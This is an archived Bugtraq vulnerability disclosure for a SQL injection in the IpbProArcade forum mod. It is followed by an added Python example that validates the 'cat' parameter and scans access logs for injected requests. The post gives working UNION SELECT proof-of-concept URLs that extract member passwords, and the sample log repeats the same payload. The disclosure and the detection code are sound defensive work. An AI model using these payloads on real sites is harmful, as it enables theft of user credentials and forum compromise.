Bugtraq mailing list archives
IpbProArace 2.5.x SQL injection.
From: axl daivy <axlownz () gmail com>
Date: 20 Nov 2004 20:05:53 -0000
I have found an SQL injection in the popular ipbproarcade mod for IPB systems (1.x and 2.x). The vuln exists in the "category" field. By using this field it is possible to inject any SQL query and compromise the entire forum system.

P.o.C. for IPB 1.x:

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

For IPB 2.x:

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

Discovered by Axl. Credit goes to HLL for helping me write the actual exploit.
Greetz to CereBrums and JonJon.

Cheers,
Axl
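Added example, not part of the original post and not code from the mod: a strict integer check for the `cat` parameter, plus a scan of web access logs for `act=Arcade` requests whose `cat` value fails that check. It assumes category ids are non-negative integers and that logs use the Apache common log format; the log lines and the names `is_valid_category` and `suspicious_arcade_requests` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the original post).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Nov/2004:20:01:11 +0000] "GET /index.php?act=Arcade&cat=3 HTTP/1.1" 200 5120
198.51.100.7 - - [20/Nov/2004:20:02:40 +0000] "GET /index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* HTTP/1.1" 200 7341
192.0.2.10 - - [20/Nov/2004:20:03:02 +0000] "GET /index.php?act=Arcade HTTP/1.1" 200 4980
192.0.2.44 - - [20/Nov/2004:20:04:15 +0000] "GET /index.php?act=Arcade&cat=2&cat=2abc HTTP/1.1" 200 5001
192.0.2.44 - - [20/Nov/2004:20:04:19 +0000] "GET /index.php?act=Login&cat=abc HTTP/1.1" 200 812
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: a category id is a short run of ASCII digits and nothing else.
CATEGORY_RE = re.compile(r"[0-9]{1,9}")


def is_valid_category(value):
    """True only for 1-9 ASCII digits; signs, spaces and keywords are rejected."""
    return CATEGORY_RE.fullmatch(value) is not None


def suspicious_arcade_requests(log_text):
    """Return (client, cat_value) for Arcade requests whose cat is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes values, so %20-encoded payloads are seen in clear.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "Arcade" not in params.get("act", []):
            continue
        # Check every occurrence: PHP keeps the last duplicate of a parameter.
        for value in params.get("cat", []):
            if not is_valid_category(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_arcade_requests(SAMPLE_LOG):
        print(f"{client}\tcat={value!r}")
```

The same allow-list check belongs in the request handler itself, before the value reaches any SQL statement, with the query built from a bound parameter or an integer cast rather than string concatenation.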